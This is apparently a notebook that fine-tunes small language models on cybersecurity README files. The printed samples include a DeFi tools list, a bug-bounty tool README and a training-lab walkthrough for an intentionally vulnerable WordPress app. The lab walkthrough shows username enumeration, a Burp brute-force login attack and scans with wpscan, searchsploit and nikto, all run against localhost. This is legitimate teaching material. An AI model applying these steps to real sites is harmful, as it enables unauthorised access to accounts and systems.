[Cliquebait](https://github.com/f-o-a-m/cliquebait) - Simplifies integration and accepting testing of smart contract applications with docker instances that closely resembles a real blockchain network\n- [Hevm](https://github.com/dapphub/dapptools/tree/master/src/hevm) - The hevm project is an implementation of the Ethereum virtual machine (EVM) made specifically for unit testing and debugging smart contracts\n- [Ethereum graph debugger](https://github.com/fergarrui/ethereum-graph-debugger) - Solidity graphical debugger\n- [Tenderly CLI](https://github.com/Tenderly/tenderly-cli) - Speed up your development with human readable stack traces\n- [Solhint](https://github.com/protofire/solhint) - Solidity linter that provides security, style guide and best practice rules for smart contract validation\n- [Ethlint](https://github.com/duaraghav8/Ethlint) - Linter to identify and fix style & security issues in Solidity, formerly Solium\n- [Decode](https://github.com/hacker-DOM/decode) - npm package which parses tx's submitted to a local testrpc node to make them more readable and easier to understand\n- [truffle-assertions](https://github.com/rkalis/truffle-assertions) - An npm package with additional assertions and utilities used in testing Solidity smart contracts with truffle. Most importantly, it adds the ability to assert whether specific events have (not) been emitted.\n- [Psol](https://github.com/Lamarkaz/psol) - Solidity lexical preprocessor with mustache.js-style syntax, macros, conditional compilation and automatic remote dependency inclusion.\n- [solpp](https://github.com/merklejerk/solpp) - Solidity preprocessor and flattener with a comprehensive directive and expression language, high precision math, and many useful helper functions.\n- [Decode and Publish](https://flightwallet.github.io/decode-eth-tx/) – Decode and publish raw ethereum tx. Similar to https://live.blockcypher.com/btc-testnet/decodetx/\n- [Doppelgänger](https://getdoppelganger.io/) - a library for mocking smart contract dependencies during unit testing.\n- [rocketh](https://github.com/wighawag/rocketh) - A simple lib to test ethereum smart contract that allow to use whatever web3 lib and test runner you choose.\n- [pytest-cobra](https://github.com/cobraframework/pytest-cobra) - PyTest plugin for testing smart contracts for Ethereum blockchain.\n- [ERCx](https://ercx.runtimeverification.com) - Testing tool with a Web interface to test conformance and properties of ERC-20 tokens. Based on Foundry forge.\n\n#### Transaction Visualization, Scoring & Tracking:\n\n- Check out Author's methodology, carefully read all parts of [thread](https://twitter.com/officer_cia/status/1493395239905734667?s=20&t=rFmBq_f9juLPNWslwrnB7Q)\n- Follow my project: [On-Chain Investigations Tools List](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List)\n\n#### What's next?\n\n- [Take a look](https://telegra.ph/Solidity-Tutorials-12-21)\n- [Carefully check out](https://telegra.ph/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [Work](https://t.me/s/officer_cia/700)\n\n#### Work...?\n\n- [Crypto Jobs List - Main](https://docs.google.com/spreadsheets/d/1AfCSrl98bNGE5_Iq-N6zYx5xmuCBpoEkiBCDQD5Keh4/edit#gid=0)\n- [web3.smsunarto.com](https://web3.smsunarto.com)\n- [2023 Global Crypto Events & Hackathons](https://docs.google.com/spreadsheets/d/1uRB5lt67Eoxfattljko7IvuQvpqkLt66YpOev9XJ22o/edit?usp=sharing)\n- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)\n- [Jobsincrypto](https://twitter.com/jobsincrypto)\n- [CryptoJobsList](https://twitter.com/CryptoJobsList)\n- [LobsterHR](https://t.me/lobsters_hr)\n- [DeveloperDAO](https://twitter.com/developer_dao)\n- [LidoGrants](https://twitter.com/LidoGrants)\n- [GitCoin](https://twitter.com/gitcoin)\n- [anonfriendly.com](http://anonfriendly.com)\n- [Web3grants](https://twitter.com/web3grants)\n- [hackathons.live](https://hackathons.live)\n- [hackenproof.com](http://hackenproof.com)\n- [bbscope](https://github.com/sw33tLie/bbscope)\n- [immunefi.com](https://immunefi.com)\n- [code4rena.com](https://code4rena.com)\n- [sherlock.xyz](https://www.sherlock.xyz)\n- [spearbit.com](https://spearbit.com)\n- [Web3SecurityDAO](https://twitter.com/Web3SecurityDAO)\n- [WHITE HAT DAO](https://twitter.com/White_Hat_DAO)\n- [Hats.Finance](https://twitter.com/HatsFinance)\n- [crypto-jobs-fyi.github.io](https://crypto-jobs-fyi.github.io/web/)\n- [auditjobs.xyz](https://auditjobs.xyz/)\n- [intropia.io/hire](https://intropia.io/hire)\n- [www.jobstash.xyz](https://www.jobstash.xyz)\n- [frontrunnrs.xyz](https://frontrunnrs.xyz)\n- [www.jobprotocol.xyz](https://www.jobprotocol.xyz)\n\n## Support Me:\n\nSupport is **very** important to me, with it I can do what I love - educating DeFi & Crypto users :sparkling_heart: First, a few words, dear friends... I want to thank everyone who sent me donations!\n\n[![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap)\n\nThe best thing is to support me directly by donating to my address on Ethereum Main-net or any of the compatible networks or to any address from the list below:\n\n- **[0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A](https://etherscan.io/address/0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A)** — ERC20 & ETH [officercia.eth](https://etherscan.io/enslookup-search?search=officercia.eth)\n\n- **[17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU](https://blockchair.com/bitcoin/address/17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU)** - BTC\n\n- **4AhpUrDtfVSWZMJcRMJkZoPwDSdVG6puYBE3ajQABQo6T533cVvx5vJRc5fX7sktJe67mXu1CcDmr7orn1CrGrqsT3ptfds** - Monero XMR \n\n- You can also support me by minting one of my [Mirror articles NFTs](https://officercia.mirror.xyz/)!\n\n#\n\n- [Check out my Telegram Channel](https://t.me/officer_cia)\n- [Follow my Twitter](https://twitter.com/officer_cia)\n- [Track all my activities](https://t.me/officer_cia/296)\n- [All my Socials](https://t.me/officer_cia/296)\n\n##\n\n**Thank you! Stay safe!**\n"
8,"# BugBounty.zip :beetle: :moneybag:\n\nWelcome to BugBounty.zip, a collection of tools aimed at making your bug hunting experience smoother and more efficient.\n\n\n## Tools :wrench:\nHere's a brief overview of the tools BugBountyZIP provides:\n\n1. **Add HTTPS:** Automatically adds HTTPS to domain list.\n2. **Remove a Word:** Helps you delete specific words from your list.\n3. **Replace a Word:** Allows you to replace specific words in your list.\n4. **Remove Duplicates:** Removes duplicate entries in your list.\n5. **Extract Endpoints:** Enables you to extract endpoints from your URL lists.\n6. **Extract Parameters:** Helps to extract parameters from URL strings.\n7. **Open Multiple URLs:** Opens multiple URLs at once.\n8. **OTP Generator:** A one-time password generator tool.\n9. **UltraSoundSource Scan:** Scans the input source code or JavaScript file to find endpoints, parameters, and domains.\n10. **Append** a specific path to entered domains/URLs.\n11. **Rapid-Hand** for faster payload injection.\n12. **Hope** a tool to scan URLs for potential vulnerable parameters, with a focus on OWASP's top 25 vulnerabilities.\n13. **Evidence** a screen recorder with audio and mic support. Recordings are saved directly to the user's local machine.\n\n## Usage :computer:\nSimply navigate to [BugBounty.zip](https://BugBounty.zip) to start using the tools.\n\n## Contribution :handshake:\nWe welcome any contributions! If you wish to contribute, please create an issue to discuss what you would like to change or improve.\n\n## Sponsors :money_with_wings:\nYour support means a lot to us. It helps us dedicate more time to maintaining this project and continue adding valuable tools. Check out the sponsorship tiers and consider becoming a sponsor. \n\n\n[![""Buy Me A Coffee""](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/BugBounty.ZIP)\n\n## License :page_with_curl:\nThis project is licensed under the MIT License. See `LICENSE` for more information.\n\n\n"
9,"# Vulnerable Wordpress Misconfig\n\n<p align=""center"">\n <img src=""images/banner.png""/>\n</p>\n\nThis is a simple Wordpress web application that contains an example of a Security Misconfiguration vulnerability and its main goal is to describe how a malicious user could exploit multiple Security Misconfiguration vulnerabilities intentionally installed on SecWeb.\n\n## Index\n\n- [Definition](#what-is-security-misconfiguration)\n- [Setup](#setup)\n- [Attack narrative](#attack-narrative)\n- [Objectives](#secure-this-app)\n- [Solutions](#pr-solutions)\n- [Contributing](#contributing)\n\n## What is Security Misconfiguration?\n\nSecurity misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.\n\nThe main goal of this app is to discuss how **Security Misconfiguration** vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.\n\n## Setup\n\nTo start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:\n\n```sh\ncd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress\n```\n\n```sh\nmake install\n```\n\nThen simply visit [localhost:8000][app] ! 😆\n\n## Get to know the app 📄\n\nTo properly understand how this application works, you can try to:\n\n- Visit its homepage!\n\n## Attack narrative\n\nNow that you know the purpose of this app, what could go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜\n\n### 👀\n\n#### Verbose error message allows for username enumeration\n\nIt's possible to reach the site through the HTTP port 8000, as shown by the image below:\n\n<p align=""center"">\n <img src=""images/banner.png""/>\n</p>\n\nHaving a closer look at what's written bellow `SECWEB` we have a sign that the site might be using the WordPress CMS. We can confirm that suspicion by trying to access the `/wp-admin` page. As we can see from the image below, our suspicion is confirmed:\n\n <p align=""center"">\n <img src=""images/attack1.png""/>\n</p>\n\nAn attacker could try to log in with the username: `admin` and realize, through the error message, that `admin` is a valid user, as depicted by the image below:\n\n <p align=""center"">\n <img src=""images/attack2.png""/>\n</p>\n\n### 🔥\n\nAt this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below:\n\n <p align=""center"">\n <img src=""images/attack10.png""/>\n</p>\n\nIn the `Positions` tab, all fields must be cleared first via the `Clear §` button. To set `pwd` to change according to each password from our dictionary wordlist, simply click on `Add §` button after selecting it:\n\n <p align=""center"">\n <img src=""images/attack11.png""/>\n</p>\n\nIf a valid password is found, the application may process new cookies and eventually redirect the flow to other pages. To guarantee that the brute force attack follows this behavior, set `Always` into `Follow Redirections` options in the `Options` tab, as shown below:\n\n<p align=""center"">\n <img src=""images/attack13.png""/>\n</p>\n\nIn `Payloads` tab, simply choose the wordlist from `Load...` option and then the attack may be performed via the `Start attack` button:\n\n <p align=""center"">\n <img src=""images/attack12.png""/>\n</p>\n\nAfter sending at around 200 requests to try and obtain a valid admin password, it is possible to see from the image below that the app redirected us when the password `password` was used, thus giving us evidence that it might be the `admin` password.\n\n <p align=""center"">\n <img src=""images/attack3.png""/>\n</p>\n\nThe suspicion was confirmed when trying to log in with these credentials. As shown below:\n\n <p align=""center"">\n <img src=""images/attack3.1.png""/>\n</p>\n\n---\n\n### 👀\n\n#### Outdated WordPress is vulnerable to an authenticated arbitrary file deletion\n\nNow that we know we're dealing with a WordPress, we can use the [WPScan] tool to perform a sweep in the app in search for known vulnerabilities. The following command can be used to install it:\n\n```sh\nbrew install wpscan\n```\n\nAnd then use this command to start a new simple scan:\n\n```sh\nwpscan -u localhost:8000\n```\n\n <p align=""center"">\n <img src=""images/attack4.png""/>\n</p>\n\n### 🔥\n\nAs seen from the image above, the tool found out that the CMS version is outdated and vulnerable to an Authenticated Arbitrary File Deletion. By using [searchsploit] tool an attacker could find a [malicious code] to exploit this vulnerability.\n\nTo install this tool, simply type the following in your OSX terminal:\n\n```sh\n⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts'\n\nbrew install exploitdb\n```\n\nThen simply search for the version of the CMS found:\n\n```sh\nsearchsploit wordpress 4.9.6\n```\n\n <p align=""center"">\n <img src=""images/attack5.png""/>\n</p>\n\n---\n\n## 👀\n\n#### Security misconfiguration allows for a browseable directory on the server\n\nBy having another look at the results from [WPScan], it's possible to see that the tool found a browseable directory in the app: `/wp-content/uploads/`, as we can see from the image below:\n\n <p align=""center"">\n <img src=""images/attack6.png""/>\n</p>\n\n## 🔥\n\nWe can confirm that the directory is browseable by accessing it through a web browser, as shown by the following image:\n\n <p align=""center"">\n <img src=""images/attack7.png""/>\n</p>\n\n---\n\n## 👀\n\n#### Misconfigured headers give away unnecessary information about the server\n\nUsing [Nikto] tool to perform a security check scan, it's possible to see that there are multiple points of attention regarding security headers.\n\nTo install it, you can use the following command in your OSX terminal:\n\n```sh\nbrew install nikto\n```\n\nThen scan the web app using:\n\n```sh\nnikto -h http://localhost:8000/\n```\n\n <p align=""center"">\n <img src=""images/attack8.png""/>\n</p>\n\nNow, by doing the following curl command to check the HTTP headers of the application, we can confirm that it indeed exposes the PHP version installed, as shown by the image below:\n\n <p align=""center"">\n <img src=""images/attack9.png""/>\n</p>\n\n---\n\n## Secure this app\n\nHow would you mitigate this vulnerability? After your changes, an attacker should not be able to:\n\n- See verbose error messages\n- Sign in with default credentials\n- See verbose tokens\n- Find an outdated CMS version\n\nNote: In this particular app, due to how it works, you can simply write down the changes you would make to mitigate those vulnerabilities and submit it as a pull request.\n\n## PR solutions\n\n[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Vuln+Wordpress+Misconfig%22)!\n\n## Contributing\n\nWe encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉\n\n[docker install]: https://docs.docker.com/install/\n[docker compose install]: https://docs.docker.com/compose/install/\n[app]: http://localhost:8000\n[wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt\n[wpscan]: https://wpscan.org/\n[malicious code]: https://www.exploit-db.com/exploits/44949\n[nikto]: https://cirt.net/Nikto2\n[searchsploit]: https://www.exploit-db.com/searchsploit\n"


As we can see, some of the texts are a full paragraph of a Wikipedia article while others are just titles or empty lines.

# **Preprocess**

In [11]:
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("bert-base-cased")


def tokenize_function(examples):
    return tokenizer(examples["text"], padding="max_length", truncation=True)


tokenized_datasets = dataset.map(tokenize_function, batched=True)

Map:   0%|          | 0/206 [00:00<?, ? examples/s]

In [13]:
from transformers import AutoModelForSequenceClassification

model = AutoModelForSequenceClassification.from_pretrained("bert-base-cased", num_labels=5)

Some weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-cased and are newly initialized: ['classifier.bias', 'classifier.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


In [14]:
from transformers import TrainingArguments

training_args = TrainingArguments(output_dir="test_trainer")

## Causal Language modeling

For causal language modeling (CLM) we are going to take all the texts in our dataset and concatenate them after they are tokenized. Then we will split them in examples of a certain sequence length. This way the model will receive chunks of contiguous text that may look like:
```
part of text 1
```
or
```
end of text 1 [BOS_TOKEN] beginning of text 2
```
depending on whether they span over several of the original texts in the dataset or not. The labels will be the same as the inputs, shifted to the left.

We will use the [`distilgpt2`](https://huggingface.co/distilgpt2) model for this example. You can pick any of the checkpoints listed [here](https://huggingface.co/models?filter=causal-lm) instead:

In [15]:
model_checkpoint = "distilgpt2"

To tokenize all our texts with the same vocabulary that was used when training the model, we have to download a pretrained tokenizer. This is all done by the `AutoTokenizer` class:

In [16]:
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained(model_checkpoint, use_fast=True)

We can now call the tokenizer on all our texts. This is very simple, using the [`map`](https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map) method from the Datasets library. First we define a function that call the tokenizer on our texts:

In [17]:
def tokenize_function(examples):
    return tokenizer(examples["text"])

Then we apply it to all the splits in our `datasets` object, using `batched=True` and 4 processes to speed up the preprocessing. We won't need the `text` column afterward, so we discard it.

In [18]:
tokenized_datasets = dataset.map(tokenize_function, batched=True, num_proc=4, remove_columns=["text"])

If we now look at an element of our datasets, we will see the text have been replaced by the `input_ids` the model will need:

In [19]:
tokenized_datasets["train"][1]

{'input_ids': [198,
  2,
  4600,
  707,
  5927,
  12,
  6057,
  12,
  12961,
  63,
  198,
  198,
  58,
  0,
  58,
  38,
  270,
  16066,
  5964,
  16151,
  5450,
  1378,
  9600,
  13,
  26662,
  82,
  13,
  952,
  14,
  12567,
  14,
  43085,
  14,
  39870,
  71,
  4309,
  1495,
  14,
  707,
  5927,
  12,
  6057,
  12,
  12961,
  15437,
  7,
  5450,
  1378,
  12567,
  13,
  785,
  14,
  39870,
  71,
  4309,
  1495,
  14,
  707,
  5927,
  12,
  6057,
  12,
  12961,
  14,
  2436,
  672,
  14,
  12417,
  14,
  43,
  2149,
  24290,
  8,
  198,
  198,
  15506,
  63,
  198,
  1532,
  345,
  1064,
  326,
  617,
  6117,
  389,
  407,
  1762,
  11,
  345,
  460,
  2391,
  6330,
  262,
  20579,
  351,
  308,
  76,
  71,
  4309,
  1495,
  13,
  220,
  198,
  5574,
  345,
  460,
  3758,
  281,
  2071,
  329,
  502,
  13,
  198,
  15506,
  63,
  198,
  198,
  2235,
  1374,
  284,
  8676,
  30,
  198,
  12,
  3740,
  1378,
  12567,
  13,
  785,
  14,
  21217,
  403,
  34,
  8635,
  14,
  3642,
  4163,

Now for the harder part: we need to concatenate all our texts together then split the result in small chunks of a certain `block_size`. To do this, we will use the `map` method again, with the option `batched=True`. This option actually lets us change the number of examples in the datasets by returning a different number of examples than we got. This way, we can create our new samples from a batch of examples.

First, we grab the maximum length our model was pretrained with. This might be a big too big to fit in your GPU RAM, so here we take a bit less at just 128.

In [20]:
# block_size = tokenizer.model_max_length
block_size = 128

Then we write the preprocessing function that will group our texts:

In [21]:
def group_texts(examples):
    # Concatenate all texts.
    concatenated_examples = {k: sum(examples[k], []) for k in examples.keys()}
    total_length = len(concatenated_examples[list(examples.keys())[0]])
    # We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
        # customize this part to your needs.
    total_length = (total_length // block_size) * block_size
    # Split by chunks of max_len.
    result = {
        k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
        for k, t in concatenated_examples.items()
    }
    result["labels"] = result["input_ids"].copy()
    return result

First note that we duplicate the inputs for our labels. This is because the model of the 🤗 Transformers library apply the shifting to the right, so we don't need to do it manually.

Also note that by default, the `map` method will send a batch of 1,000 examples to be treated by the preprocessing function. So here, we will drop the remainder to make the concatenated tokenized texts a multiple of `block_size` every 1,000 examples. You can adjust this behavior by passing a higher batch size (which will also be processed slower). You can also speed-up the preprocessing by using multiprocessing:

In [22]:
lm_datasets = tokenized_datasets.map(
    group_texts,
    batched=True,
    batch_size=1000,
    num_proc=4,
)

And we can check our datasets have changed: now the samples contain chunks of `block_size` contiguous tokens, potentially spanning over several of our original texts.

In [23]:
tokenizer.decode(lm_datasets["train"][1]["input_ids"])

'.io/github/license/harisqazi1/Cybersecurity)](https://github.com/harisqazi1/Cybersecurity/blob/main/LICENSE)\n\n</p>\n\n# Cybersecurity Document\nThis document is meant to be a Swiss Army Knife for entry level Cybersecurity jobs and to learn hacking skills. A work in progress, so if you see mistakes, please mention it in the "Issues" section. \n\nNOTE: I DO NOT OWN ANY OF THIS INFORMATION. THIS IS JUST MEANT TO BE A COMPILATION OF VARIOUS'

Now that the data has been cleaned, we're ready to instantiate our `Trainer`. We will a model:

In [24]:
from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained(model_checkpoint)

And some `TrainingArguments`:

In [25]:
from transformers import TrainingArguments

In [26]:
model_name = model_checkpoint.split("/")[-1]
training_args = TrainingArguments(
    f"{model_name}-finetuned-cybersecurity_readme",
    evaluation_strategy = "epoch",
    learning_rate=2e-5,
    weight_decay=0.01,
    push_to_hub=True,
)

The last argument to setup everything so we can push the model to the [Hub](https://huggingface.co/models) regularly during training. Remove it if you didn't follow the installation steps at the top of the notebook. If you want to save your model locally in a name that is different than the name of the repository it will be pushed, or if you want to push your model under an organization and not your name space, use the `hub_model_id` argument to set the repo name (it needs to be the full name, including your namespace: for instance `"sgugger/gpt-finetuned-wikitext2"` or `"huggingface/gpt-finetuned-wikitext2"`).

In [27]:
# !pip install transformers
from transformers.trainer import Trainer

print(Trainer.__init__.__doc__)

None


In [28]:
small_train_dataset = lm_datasets["train"].shuffle(seed=42).select(range(1000))
small_eval_dataset = lm_datasets["validation"].shuffle(seed=42).select(range(1000))

We pass along all of those to the `Trainer` class:

In [29]:
# trainer = Trainer(
#     model=model,
#     args=training_args,
#     train_dataset=lm_datasets["train"],
#     eval_dataset=lm_datasets["validation"],
# )
trainer = Trainer(
    model=model,
    args=training_args,
    train_dataset=small_train_dataset,
    eval_dataset=small_eval_dataset,
)

And we can train our model:

In [30]:
trainer.train()

Epoch,Training Loss,Validation Loss
1,No log,3.03301
2,No log,2.990992
3,No log,2.986135


TrainOutput(global_step=375, training_loss=3.3700319010416666, metrics={'train_runtime': 689.4567, 'train_samples_per_second': 4.351, 'train_steps_per_second': 0.544, 'total_flos': 97986281472000.0, 'train_loss': 3.3700319010416666, 'epoch': 3.0})

Once the training is completed, we can evaluate our model and get its perplexity on the validation set like this:

In [31]:
import math
eval_results = trainer.evaluate()
print(f"Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

Perplexity: 19.81


You can now upload the result of the training to the Hub, just execute this instruction:

In [32]:
trainer.push_to_hub()

events.out.tfevents.1713098246.cb6a4e3c1638.14960.0:   0%|          | 0.00/5.05k [00:00<?, ?B/s]

events.out.tfevents.1713098506.cb6a4e3c1638.14960.1:   0%|          | 0.00/10.0k [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/328M [00:00<?, ?B/s]

events.out.tfevents.1713099596.cb6a4e3c1638.20503.0:   0%|          | 0.00/6.22k [00:00<?, ?B/s]

Upload 7 LFS files:   0%|          | 0/7 [00:00<?, ?it/s]

events.out.tfevents.1713098831.cb6a4e3c1638.14960.2:   0%|          | 0.00/5.05k [00:00<?, ?B/s]

events.out.tfevents.1713100367.cb6a4e3c1638.20503.1:   0%|          | 0.00/359 [00:00<?, ?B/s]

training_args.bin:   0%|          | 0.00/4.98k [00:00<?, ?B/s]

CommitInfo(commit_url='https://huggingface.co/LDDon/distilgpt2-finetuned-cybersecurity_readme/commit/0c28e48a50dffebc2c15ce1ba6bb665d78251966', commit_message='End of training', commit_description='', oid='0c28e48a50dffebc2c15ce1ba6bb665d78251966', pr_url=None, pr_revision=None, pr_num=None)

You can now share this model with all your friends, family, favorite pets: they can all load it with the identifier `"your-username/the-name-you-picked"` so for instance:

```python
from transformers import AutoModelForCausalLM

model = AutoModelForCausalLM.from_pretrained("sgugger/my-awesome-model")
```

## Masked language modeling

For masked language modeling (MLM) we are going to use the same preprocessing as before for our dataset with one additional step: we will randomly mask some tokens (by replacing them by `[MASK]`) and the labels will be adjusted to only include the masked tokens (we don't have to predict the non-masked tokens).

We will use the [`distilroberta-base`](https://huggingface.co/distilroberta-base) model for this example. You can pick any of the checkpoints listed [here](https://huggingface.co/models?filter=masked-lm) instead:

In [33]:
model_checkpoint = "distilroberta-base"

We can apply the same tokenization function as before, we just need to update our tokenizer to use the checkpoint we just picked:

In [34]:
tokenizer = AutoTokenizer.from_pretrained(model_checkpoint, use_fast=True)
tokenized_datasets = dataset.map(tokenize_function, batched=True, num_proc=4, remove_columns=["text"])

And like before, we group texts together and chunk them in samples of length `block_size`. You can skip that step if your dataset is composed of individual sentences.

In [35]:
lm_datasets = tokenized_datasets.map(
    group_texts,
    batched=True,
    batch_size=1000,
    num_proc=4,
)

The rest is very similar to what we had, with two exceptions. First we use a model suitable for masked LM:

In [36]:
from transformers import AutoModelForMaskedLM
model = AutoModelForMaskedLM.from_pretrained(model_checkpoint)

Some weights of the model checkpoint at distilroberta-base were not used when initializing RobertaForMaskedLM: ['roberta.pooler.dense.bias', 'roberta.pooler.dense.weight']
- This IS expected if you are initializing RobertaForMaskedLM from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model).
- This IS NOT expected if you are initializing RobertaForMaskedLM from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model).


We redefine our `TrainingArguments`:

In [37]:
model_name = model_checkpoint.split("/")[-1]
training_args = TrainingArguments(
    f"{model_name}-finetuned-cybersecurity_readme2",
    evaluation_strategy = "epoch",
    learning_rate=2e-5,
    weight_decay=0.01,
    push_to_hub=True,
)

Like before, the last argument to setup everything so we can push the model to the [Hub](https://huggingface.co/models) regularly during training. Remove it if you didn't follow the installation steps at the top of the notebook. If you want to save your model locally in a name that is different than the name of the repository it will be pushed, or if you want to push your model under an organization and not your name space, use the `hub_model_id` argument to set the repo name (it needs to be the full name, including your namespace: for instance `"sgugger/bert-finetuned-wikitext2"` or `"huggingface/bert-finetuned-wikitext2"`).

Finally, we use a special `data_collator`. The `data_collator` is a function that is responsible of taking the samples and batching them in tensors. In the previous example, we had nothing special to do, so we just used the default for this argument. Here we want to do the random-masking. We could do it as a pre-processing step (like the tokenization) but then the tokens would always be masked the same way at each epoch. By doing this step inside the `data_collator`, we ensure this random masking is done in a new way each time we go over the data.

To do this masking for us, the library provides a `DataCollatorForLanguageModeling`. We can adjust the probability of the masking:

In [38]:
from transformers import DataCollatorForLanguageModeling
data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=0.15)

In [39]:
small_train_dataset = lm_datasets["train"].shuffle(seed=42).select(range(1000))
small_eval_dataset = lm_datasets["validation"].shuffle(seed=42).select(range(1000))

Then we just have to pass everything to `Trainer` and begin training:

In [40]:
trainer = Trainer(
    model=model,
    args=training_args,
    train_dataset=small_train_dataset,
    eval_dataset=small_eval_dataset,
    data_collator=data_collator,
)

In [41]:
trainer.train()

Epoch,Training Loss,Validation Loss
1,No log,1.815138
2,No log,1.75278
3,No log,1.701787


TrainOutput(global_step=375, training_loss=2.1721022135416668, metrics={'train_runtime': 545.9654, 'train_samples_per_second': 5.495, 'train_steps_per_second': 0.687, 'total_flos': 99466354944000.0, 'train_loss': 2.1721022135416668, 'epoch': 3.0})

Like before, we can evaluate our model on the validation set. The perplexity is much lower than for the CLM objective because for the MLM objective, we only have to make predictions for the masked tokens (which represent 15% of the total here) while having access to the rest of the tokens. It's thus an easier task for the model.

In [42]:
eval_results = trainer.evaluate()
print(f"Perplexity: {math.exp(eval_results['eval_loss']):.2f}")

Perplexity: 5.64


You can now upload the result of the training to the Hub, just execute this instruction:

In [43]:
trainer.push_to_hub()

model.safetensors:   0%|          | 0.00/329M [00:00<?, ?B/s]

Upload 4 LFS files:   0%|          | 0/4 [00:00<?, ?it/s]

events.out.tfevents.1713101175.cb6a4e3c1638.20503.3:   0%|          | 0.00/359 [00:00<?, ?B/s]

events.out.tfevents.1713100540.cb6a4e3c1638.20503.2:   0%|          | 0.00/5.91k [00:00<?, ?B/s]

training_args.bin:   0%|          | 0.00/5.05k [00:00<?, ?B/s]

CommitInfo(commit_url='https://huggingface.co/LDDon/distilroberta-base-finetuned-cybersecurity_readme2/commit/16e5bb2bd8f78d9270ffb6f81da9f31cd20a2bc4', commit_message='End of training', commit_description='', oid='16e5bb2bd8f78d9270ffb6f81da9f31cd20a2bc4', pr_url=None, pr_revision=None, pr_num=None)

You can now share this model with all your friends, family, favorite pets: they can all load it with the identifier `"your-username/the-name-you-picked"` so for instance:

```python
from transformers import AutoModelForMaskedLM

model = AutoModelForMaskedLM.from_pretrained("sgugger/my-awesome-model")
```